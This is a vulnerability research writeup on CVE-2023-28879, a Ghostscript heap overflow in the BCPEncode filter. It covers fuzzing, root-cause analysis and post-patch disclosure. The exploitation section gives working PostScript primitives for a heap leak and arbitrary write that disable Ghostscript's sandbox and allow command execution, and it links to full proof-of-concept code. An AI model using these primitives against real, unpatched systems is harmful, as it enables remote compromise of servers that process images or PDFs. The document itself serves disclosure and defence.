# Shell in the Ghost: Ghostscript CVE-2023-28879 writeup
Published on Tue 11 April 2023 by [@sigabrt9](/author/sigabrt9.html) _
**tl;dr** This write-up details how CVE-2023-28879 - an RCE in Ghostscript -
was found and exploited. Due to the prevalence of Ghostscript in PostScript
processing, this vulnerability may be reachable in many applications that
process images or PDF files (e.g. ImageMagick, PIL, etc.), making this an
important one to patch and look out for.
## Introduction
A few months ago, during a web application audit we noticed that the
application was using the Python Image Library (PIL) to perform resizing on
the uploaded images. With a bit of curiosity we went to read the code and
stumbled on the `src/PIL/EpsImagePulgin.py` file, which is in fact a wrapper
around the Ghostscript binary that is used to handle the Encapsulated
PostScript file format.
The Ghostscript binary is called from Python, which means that if we managed
to find a vulnerability in Ghostscript, we could have access to the web
server. As I was soon to realize, the Ghostscript binary is also used in other
places, which means that finding a vulnerability was pretty interesting from
an attacker point of view.
## What is Ghostscript ?
First thing first, a quick recap: [Ghostscript](https://artifex.com/products/ghostscript/) is (among other things) an interpreter for the PostScript language, an old language used for page description, which is still widely used in printers, as demonstrated in the [2022 Toronto Pwn2Own competition](https://twitter.com/alexjplaskett/status/1634158797215129601) (Note that, however, in printers, it is probably another interpreter that is used to execute the PostScript). Furthermore, Ghostscript can also be used to manipulate PDF and to convert certain types of files onto another.
![gs](https://images.seebug.org/1681268406849-w331s)
Ghostscript is still widely used under the hood of a lot of applications and
libraries. For some examples:
* The libspectre library, used by the PDF viewer Evince, is a wrapper around Ghostcript
* The PIL library also uses Ghostscript to manage certain files.
* The ImageMagick library also offers the possibility to manipulate EPS file, which is delegated to Ghostscript under the hood.
* A lot of web applications also manipulate PDF files directly with Ghostscript in order to merge pages or reduce their size. It is possible to smuggle PostScript within those files with the tool [ghostinthepdf](https://github.com/neex/ghostinthepdf).
This list is of course not exhaustive and there are plenty of others softwares
that comes to mind. From an attacker perspective, the main limitation is
ususally finding a way to make the application accept and parse a PostScript
input.
## Attacking Ghostscript
Knowing this, a sensible approach to find relevant bugs is fuzzing. While the project is already fuzzed by [OSS-Fuzz](https://github.com/google/oss-fuzz/tree/master/projects/ghostscript), using a more specific grammar-oriented methodology might yield better results. The chosen strategy was to focus on the PostScript interpreter, and to use the [Grammar-Mutator](https://github.com/AFLplusplus/Grammar-Mutator) tool with AFL to perform the fuzzing.
Retrieving all PostScript operators can be done quickly within the code - an operator declaration always starts with `const op_def` - or by reading the documentation (which is probably more time consuming). Obviously, the more complete the grammar is, the more likely bugs are to arise. The PostScript grammar is fairly simple as it is a stack based language, meaning that there is no need for end of line or semicolons. Still, it is interesting to define a grammar for the procedure, dictionnary and array declaration. The following [harness](https://github.com/nelhage/ghostscript-afl) was used to call Ghostscript. After a while, even on a really slow machine, a handful of bugs showed up.
![AFL](https://images.seebug.org/1681268408601-w331s)
Considerable time was dedicated to triage the crashes and understand the root
cause for some of those, which was not trivial as Ghostscript is quite a
complexe piece of software. In the end, an interesting bug that was easy
enough to understand stood out.
## The bug
The PostScript causing Ghostscript to crash was the following:
`(){} /zlibEncode filter /BCPEncode filter /LZWEncode filter /ASCII85Encode
filter /ASCIIHexEncode filter /PSStringEncode filter /ASCII85Encode filter
/ASCIIHexEncode filter /ASCIIHexEncode filter /ASCIIHexEncode filter
/ASCII85Encode filter /ASCII85Encode filter /ASCIIHexEncode filter
/PSStringEncode filter /ASCIIHexEncode filter /ASCIIHexEncode filter
/BCPEncode filter /ASCIIHexEncode filter /PSStringEncode filter /MD5Encode
filter closefile`
In gdb, the crash looks like this:
![FirstCrash](https://images.seebug.org/1681268410488-w331s)
It seems that the bug corrupted a function pointer, which is later called for
execution. This is quite interesting on its own, but there were also several
other crash files that looked similar, but with a different crash cause.
For example, the following PostScript:
`() (1337leet) /FlateEncode filter /ASCII85Encode filter dup /TBCPEncode
filter rootfont /CCITTFaxEncode filter rootfont /zlibEncode filter rootfont
/ASCIIHexEncode filter rootfont /ASCIIHexEncode filter rootfont
/ASCIIHexEncode filter rootfont /ASCIIHexEncode filter rootfont
/CCITTFaxEncode filter rootfont /ASCIIHexEncode filter rootfont
/ASCIIHexEncode filter rootfont /CCITTFaxEncode filter rootfont
/ASCIIHexEncode filter rootfont /ASCIIHexEncode filter rootfont /ASCII85Encode
filter rootfont /ASCIIHexEncode filter rootfont /ASCIIHexEncode filter
rootfont /ASCIIHexEncode filter rootfont /PSStringEncode filter /SHA256Encode
filter closefile`
would cause a `memcpy` to a random location:
![secondeCrash](https://images.seebug.org/1681268412464-w331s)
Hopefully, experience in the PostScript language is not too necessary to
understand what is happening. The crash file seems to call the operator
"filter" on a string repeatedly before closing the file. According to the
[documentation](https://www.adobe.com/jp/print/postscript/pdfs/PLRM.pdf#%5B%7B%22num%22%3A716%2C%22gen%22%3A0%7D%2C%7B%22name%22%3A%22XYZ%22%7D%2Cnull%2C616%2Cnull%5D),
a filter is just a "special kind of file object" that can be put on top of
another file, a string, or a procedure (PostScript equivalent of a function).
Depending on the filter used, the file, string or procedure will be written to
or read from. In this case, the crash files only use "Encode" filters, so the
string variable will be written to, which is called a "data target" within the
documentation.
For example, the following creates a file object. Any string written to this
file will first be hashed using the SHA256 algorithm, then the result will be
hex encoded, and finally written to the data target (here, the string "aaaa"):
(aaaa) /ASCIIHexEncode filter /SHA256Encode filter
Basically, the crash file creates data from "nothing" by hashing an empty
string with the SHA256 or MD5 algorithm, and then proceeds to pass the data to
multiple other encoding algorithms. Those algorithms transform the data -
enlarging or reducing the amount accordingly - before the result is finally
written to a string. Afterwards, the created file is closed with `closefile`
(which also forces the buffered data to be written). Chances are, one of those
algorithms contains an interesting bug!
The code to look at is the function `swritebuf` in the `base/stream.c` file.
Every time a filter is called, a stream data structure is created and attached
to the existing ones. This stream structure is described in `base/stream.h`.
It contains, among a lot of other things, a pointer to the next stream, a list
of function pointers indicating which function should be called when a
specific operator is called on the file, and a structure that describes the
buffers data that should be read from and written to. In both cases (read and
write), this structure includes a pointer to the current position in the
buffer, and a pointer to the limit that should not be crossed.
Furthermore, the `swritebuf` function contains handy debug print statements
that can be called by compiling Ghostscript in debug mode and passing the
`-Zs` switch. Starting Ghostscript with this debug switch and reading the
debug messages shows something interesting:
./gs -Zs
[...]
GS>[s]after write 0x5591c01675e8, nr=0, nw=0, end=0,status=0
[s]read process 0x5591c0167060, nr=0, nw=1024,eof=0
(){} /zlibEncode filter /BCPEncode filter /LZWEncode filter /ASCII85Encode filter /ASCIIHexEncode filter /PSStringEncode filter /ASCII85Encode filter /ASCIIHexEncode filter /ASCIIHexEncode filter /ASCIIHexEncode filter /ASCII85Encode filter /ASCII85Encode filter /ASCIIHexEncode filter /PSStringEncode filter /ASCIIHexEncode filter /ASCIIHexEncode filter /BCPEncode filter /ASCIIHexEncode filter /PSStringEncode filter /MD5Encode filter closefile
[...]
[s]write process 0x5591c044cf48(LZWDecode state), nr=2047, nw=236, end=0
[s]after write 0x5591c044cf48, nr=1605, nw=4, end=0, status=1
[s]moving ahead, depth = 7
[s]write process 0x5591c044c4f8(stream_state), nr=2044, nw=1549, end=0
[s]after write 0x5591c044c4f8, nr=549, nw=4294967295, end=0, status=1
[s]moving ahead, depth = 8
[s]write process 0x5591c017ced8(zlibEncode/Decode state), nr=2049, nw=126, end=0
[s]after write 0x5591c017ced8, nr=0, nw=126, end=0, status=0
[s]moving back, depth = 7
[s]write process 0x5591c044c4f8(stream_state), nr=549, nw=4294967295, end=0
[s]after write 0x5591c044c4f8, nr=1722991892, nw=4294966726, end=0, status=0
[s]moving back, depth = 6
[s]write process 0x5591c044cf48(LZWDecode state), nr=1605, nw=1669303638, end=0
[s]after write 0x5591c044cf48, nr=1605, nw=1669303638, end=0, status=1
Segmentation fault
The `swritebuf` function can be reviewed to understand the debug statement
outputs. Every time a PostScript program writes to a file, it starts by
initializing the current stream, and the read and write pointers. The special
cases are if it is the first stream (then it will be reading from "user
input") or the last stream (then it will be writing to the final file).
Otherwise, the read pointer is initialized to the previous stream, and the
write pointer to the next one. An important note is that the buffer size for
an intermediate stream is 2048.
With that information, the `if_debug5m` statements become a lot clearer.
Before the write, there is the following debug statement:
if_debug5m('s', s->memory,
"[s]write process "PRI_INTPTR"(%s), nr=%u, nw=%u, end=%d\n",
(intptr_t)curr,
gs_struct_type_name(curr->state->templat->stype),
(uint)(pr->limit - pr->ptr),
(uint)(pw->limit - pw->ptr), end);
The `gs_struct_type_name(curr->state->templat->stype)` indicates the name of
the filter being used, `(uint)(pr->limit - pr->ptr)` can be translated as "how
many characters will be read" and `(uint)(pw->limit - pw->ptr)` would be "what
space there is left".
The filter process is then called by looking the function pointer in the
current stream `status = (*curr->procs.process)(curr->state, pr, pw, end);`
And then, after the filter process, there is the following debug print:
if_debug5m('s', s->memory,
"[s]after write "PRI_INTPTR", nr=%u, nw=%u, end=%d, status=%d\n",
(intptr_t) curr, (uint) (pr->limit - pr->ptr),
(uint) (pw->limit - pw->ptr), end, status);
Again, `(pr->limit - pr->ptr)` can be translated as "how many characters there
is left to read in the buffer", or "how many characters were not read" and the
`(pw->limit - pw->ptr)` would be "how much space there is left". It is easy to
see that something went wrong in the `stream_state` filter, as the debug
statement shows that there is way to much space left:
[s]write process 0x5591c044c4f8(stream_state), nr=2044, nw=1549, end=0
[s]after write 0x5591c044c4f8, nr=549, nw=4294967295, end=0, status=1
The `gs_struct_type_name` equals `stream_state` for both the `BCPEncode` and
the `TBCPEncode` filter. Those filters are not described in the PostScript
documentation, but the
[Ghostscript](https://ghostscript.com/docs/9.56.1/Language.htm) website
explains that they are both non-standard filters implementing the Adobe Binary
Communications Protocol and the Adobe Tagged Binary Communications Protocol
respectively. Thankfully, the code is pretty clear, and can be found in
`base/sbcp.c`.
They both declare a list of bytes to escape, and then call the
`s_xBCPE_process` function, which is the following:
static int
s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
stream_cursor_write * pw, bool last, const byte * escaped)
{
const byte *p = pr->ptr;
const byte *rlimit = pr->limit;
uint rcount = rlimit - p;
byte *q = pw->ptr;
uint wcount = pw->limit - q;
const byte *end = p + min(rcount, wcount);
while (p < end) {
byte ch = *++p;
if (ch <= 31 && escaped[ch]) {
if (p == rlimit) {
p--;
break;
}
*++q = CtrlA;
ch ^= 0x40;
if (--wcount < rcount)
end--;
}
*++q = ch;
}
pr->ptr = p;
pw->ptr = q;
return (p == rlimit ? 0 : 1);
}
In this function, each character read is compared to the list of escaped
characters. If it is not in the list, it is simply written as is. If it is in
the escape list, some checks are performed. First check (`p == rlimit`) makes
sure that the read pointer `p` is not at the last character of the buffer
being read. If it is, the read pointer is decremented and the loop exits. If
it's not, it writes `CtrlA` (which is `0x01`), increments the write pointer,
and xor the current character with `0x40`. After the last check, it writes the
current character (the xored one) and increments once more the write pointer.
The `if (--wcount < rcount)` check tries to acknowledge for this double write
by decrementing the `end` limit pointer if the receving buffer have less space
than the buffer which filter is reading from. Afterwards, the read and write
pointers are updated and the function returns.
With the code, the debug statement and a bit of debugging, the root cause of
the bug became a lot clearer. It seems that, after the `s_xBCPE_process`
function the `pw->ptr` is updated to a value greater than `pw->limit`, causing
the `(uint) (pw->limit - pw->ptr)` operation to overflow.
The following piece of PostScript will cause this overflow:
/writtenTo {4 string} def % declare an empty string of size 4
/theFilter writtenTo /BCPEncode filter def % declare a filter, using the BCPEncode that writes to the string
/readsFrom <414141134141> def % declare a string of size 6: 5 'A's and 0x13, which is an escaped character
theFilter readsFrom writestring % write the string to the filter
theFilter flushfile % flush the file for the write to happen
Creating a smaller string to write to than the string we are trying to read
from always passes the `p == rlimit` check. Filling the buffer to one byte
less than full, and then passing an escaped character causes two `q`
increments. Even if the `end` pointer is correctly decremented, the check `p <
end` happen too late, as `q` is already greater than `pw->limit` when the loop
exits. The previous POC will confirm this bug with the debug switch `-Zs`:
./gs -Zs -f poc.ps
[...]
[s]init 0x560dc8218ba8, buf=0x560dc8218d20, len=2048, modes=2
[s]write process 0x560dc8218ba8(stream_state), nr=6, nw=4, end=0
[s]after write 0x560dc8218ba8, nr=2, nw=4294967295, end=0, status=1
[s]moving ahead, depth = 1
[s]write process 0x560dc82125a8(stream_state), nr=5, nw=0, end=0
[s]after write 0x560dc82125a8, nr=5, nw=0, end=0, status=-2
[s]unwinding
[s]write process 0x560dc7f4f668(stream_state), nr=15, nw=0, end=0
Error: /ioerror[s]after write 0x560dc7f4f668, nr=0, nw=0, end=0, status=0
[...]
After the write, the `nw` variable (which is `pw->limit - pw->ptr`) has
overflowed. The next write to this stream should cause an out-of-bounds write,
however in this case, trying to do so raises an `ioerror`, indicating that the
file is closed because there is no more space to write to.
## The exploit
The bug found by the fuzzer goes around the `ioerror` limitation by chaining multiple filters. As said earlier in this blogpost, the stream created by a filter has a maximum buffer size of 2048. If the input string is larger than 2048 characters, the first stream' buffer will be filled, and the next stream will be called. If the second stream manages to process all the data, the first stream will be called again to get more input. If the second stream buffer is also filled by the data, the third stream will be called, and so on. This behavior can be seen in the debug message:
if_debug1m('s', strm->memory, "[s]moving ahead, depth = %d\n", depth);
if_debug0m('s', s->memory, "[s]unwinding\n");
if_debug1m('s', s->memory, "[s]moving back, depth = %d\n", depth);
It also offers a good way to exploit the bug. By chaining two filters to write
to a big string and giving an input larger than 2048, it is possible to
corrupt the `pw->ptr` to be greater than `pw->limit`. The second filter will
be then called to output the data to the string, which should be large enough
to contain all the data, thus never meeting the `ioerror`. When going back to
the first stream, it reuses the `pw->ptr` pointer that will never encounter
the `pw->limit` and start overwriting an interesting structure.
The next structure in the heap is in fact the current stream structure, which
means there are numerous interesting values to overwrite. For example,
overwriting one of the function pointer within the procs structure to take
control of the program control flow. I used BCPEncode for the vulnerable
filter and NullEncode as the second filter. NullEncode creates a stream and
just moves the data without any alteration, which is perfect.
![3rd](https://images.seebug.org/1681268414577-w331s)
As the big string is still not full, writing again in the filter will call the
overwritten function pointer:
![4th](https://images.seebug.org/1681268416535-w331s)
If it is enough to impress the coworkers, it won't work in the wild as there
is no way to know in advance the address of the `system` function within the
libc. However, before the procs structure, there is both a read and write
cursor, which is enough to get a leak from the heap and craft an arbitrary
write primitive. With those primitives, the exploit strategy is fairly simple.
As a complete language, PostScript offers ways to read and write files on the
disk. It even has a way to call subprocess by writing to the %pipe% device.
Obviously, as Ghostscript often deals with files coming from untrusted source,
it implement a sandbox that prevents the PostScript program to read or write
file outside a certain whitelist. This validation is done in the
`gp_validate_path_len` function in `base/gpmisc.c`. The first few lines are
really interesting, as it checks if the sandbox is active:
/* mem->gs_lib_ctx can be NULL when we're called from mkromfs */
if (mem->gs_lib_ctx == NULL ||
mem->gs_lib_ctx->core->path_control_active == 0)
return 0;
The `mem` variable is in fact a sub structure of the complex `context`
structure, which keeps all the information from the current state of the
execution. The `path_control_active` variable can be found in
`i_ctx_p->memory->current->gs_lib_ctx->core->path_control_active`. The context
structure is also located in the heap, so leaking a heap pointer should be
enough to locate the `path_control_active` variable. With an arbitrary write,
it is possible to overwrite this variable hopefully without causing the
process to crash, and then call any commands with the `%pipe%` device.
Getting a leak from the heap is simple. In the stream structure, overwriting
the cursor read pointer (`curr->cursor->r->ptr`) will force the next stream to
copy all the data until this pointer. However, this pointer is overwritten to
its previous value in the last line of the `s_xBCPE_process` function (and
later on in the `stream_compact` function). The next NullEncode stream will
then copy this data to stdout:
% - -> a long string
/createOverflow {
()
1 1 2045 {pop <41> concatstrings}for
<1313> concatstrings %escaped char
1 1 15 {pop <42> concatstrings} for
}def
% (leak) -> leak as hexadecimal string
/leakAsString{
/myString 16 string def
/asciiToHexFilter myString /ASCIIHexEncode filter def
asciiToHexFilter exch writestring
asciiToHexFilter flushfile
myString
}def
% - -> a 8 bytes leak from the heap (i/o pool)
/leakMemory{
/leakBuffer 5000 string def
/leakMemoryFilter leakBuffer /NullEncode filter /BCPEncode filter def
createOverflow
<4343434343434343> concatstrings % s->templat
<4444444444444444> concatstrings % s->memory
<4545454545454545> concatstrings % s->report_error
<4646464646464646> concatstrings % s->min_left
1 1 80 {pop <47> concatstrings } for % s->error_string
<4848484848484848> concatstrings % s->cursor->r->ptr
leakMemoryFilter exch writestring
leakMemoryFilter flushfile
/leak leakBuffer 2176 8 getinterval def
leak
reverse
} def
![6](https://images.seebug.org/1681268418583-w331s)
From this leak, it is possible to calculate the address of
`path_control_active` variable. The offset between the leak and the
`path_control_active` variable changes with the various options passed as
arguments to Ghostscript but remains the same if the same arguments are
passed.
In a similar way, arbitrary write can be achieved by overwriting the write
cursor pointer by an arbitrary address:
% what where -> -
/writewhatwhere {
createOverflow
<4343434343434343> concatstrings % s->templat
<4444444444444444> concatstrings % s->memory
<4545454545454545> concatstrings % s->report_error
<4646464646464646> concatstrings % s->min_left
1 1 80 {pop <47> concatstrings } for % s->error_string
<4848484848484848> concatstrings % s->cursor->r->ptr
exch concatstrings % (where) s->cursor->r->limit - also update s->cursor->w->ptr
<4444444444444444> concatstrings % s->cursor->w->limit
<4545454545454545> concatstrings % s->cbuf.
/openWriteFilter 5000 string /NullEncode filter /BCPEncode filter def
openWriteFilter exch writestring
openWriteFilter flushfile
openWriteFilter exch writestring
}def
![7](https://images.seebug.org/1681268420130-w331s)
The next write to the corrupted stream will cause the `sputs` function to
write to the chosen address:
![8](https://images.seebug.org/1681268421819-w331s)
Everything is in place, writing a bunch of null bytes on the
`path_control_active` address will disable the sandbox, allowing for arbitrary
command execution via the pipe device:
![9](https://images.seebug.org/1681268423624-w331s)
Note that it is not possible to write (at least in this POC) characters from
the escape list in the `s_xBCPE_process` function, so you may have to relaunch
the exploit a few times to get a heap address without those bytes.
## Conclusion
If the exploit strategy used is enough for a PoC, it is still not reliable enough (in my opinion) to exploit this vulnerability in the wild, as the offset between the leak and the `path_control_active` changes depending on the Ghostscript version and the options that are passed to it.
One could try to create an arbitrary read primitive and find the correct address for the `path_control_active` variable, in order to exploit all versions and setups of Ghostscript with a single file.
If the bug was still pretty fun and easy to exploit, it is not quite as stable to exploit than non-memory corruption bugs such as [CVE-2021-3781](https://www.ghostscript.com/blog/CVE-2021-3781.html), which could easily be embeded in various files and would work without modification on any platform or Ghostscript configuration.
However, the primitives that this bug offers should be powerful enough to obtain code execution in most cases. Combined with the large attack surface that Ghostscript can be found in - including many applications that process images or PDF files (e.g. ImageMagick, PIL, etc.) - make this vulnerability an important one to look out for.
## Proof of Concept
Mandatory calc on the latest Ubuntu LTS release (22.04):
PoCs are available
[here](https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce) and
can be adapted with offsets for your Ghostscript version / environment
(version implementing the loop described above coming soon).
## Fix
Artifex has released a patch and an
[advisory](https://artifex.com/news/critical-security-vulnerability-fixed-in-
ghostscript). Users should apply updates through usual channels (availability
may vary depending on your distro).
## References
<https://bugs.ghostscript.com/show_bug.cgi?id=706494>
<https://artifex.com/news/critical-security-vulnerability-fixed-in-
ghostscript>
<https://nvd.nist.gov/vuln/detail/CVE-2023-28879>
## Timeline
**2023-03-23:** Bug and exploit disclosed on Ghostscript's BugZilla
**2023-03-24:** Vendor acknowledgement of the bug and report
**2023-03-24:** Source code patches
**2023-04-07:** Vendor publishes fix and advisory
**2023-04-11:** Publication of this article
暂无评论